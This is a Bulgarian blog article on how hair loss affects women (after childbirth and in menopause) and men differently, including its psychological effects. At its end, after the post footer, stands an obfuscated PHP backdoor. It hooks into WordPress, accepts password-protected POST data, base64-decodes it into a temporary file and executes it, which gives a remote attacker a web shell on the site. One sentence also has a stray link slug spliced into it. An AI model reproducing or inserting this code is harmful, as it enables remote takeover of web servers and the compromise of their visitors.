Как се отразява косопадът на мъжете и жените | Косопад

Как се отразява косопадът на мъжете и жените

Въпреки че обикновено свързваме косопада с мъжете, жените също често страдат от него. При двата пола обаче проблемът се възприема по различен начин.

kosopad-recepti

При жените косопад най- често настъпва в два периода: след раждане и в менопаузата. След като роди, хормоните са все още разбъркани и докато се балансират, често се появява косопад. Продължава най- много 6 месеца след раждането.

В менопаузата обаче хормоналните промени стават постоянни и затова трудно се овладява косопада. Естетическия удар да видиш как дългата ти и гъста коса става тънка и вяла, е огромен. Да не говорим, ако направо се появяват олисели места. Жените трудно се справят с психологическата травма.

За жените косата им е символ на идентичност и има много по- голямо значение, отколкото при мъжете. Загубата наopleshivyavane-prichini този женски белег се преживява трудно и удря по самочувствието. Жени с такъв проблем обикновено принасят липсата на увереност в социалните си контакти.

Събирания с хора, които преди са ни доставяли радост и удоволствие, сега могат много да ни изплашат заради липсата на коса. Ако жената обаче открие как да си върне косата, психологическото неразположение също ще изчезне.

При мъжете косопада се отразява по различен начин. Въпреки че също може да се появи социална несигурност, по- обичайни са симптоми като раздразнителност, безсъние или липса на енергия.

Някои мъже дори си мислят, че липсата на коса вреди на мъжествеността им. Ситуации, в които преди са се чувствали сигурни, като работни срещи, интимности с жени, сега могат да ги накарат да се чувстват несигурни.

10. май 2014 20:36:18 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}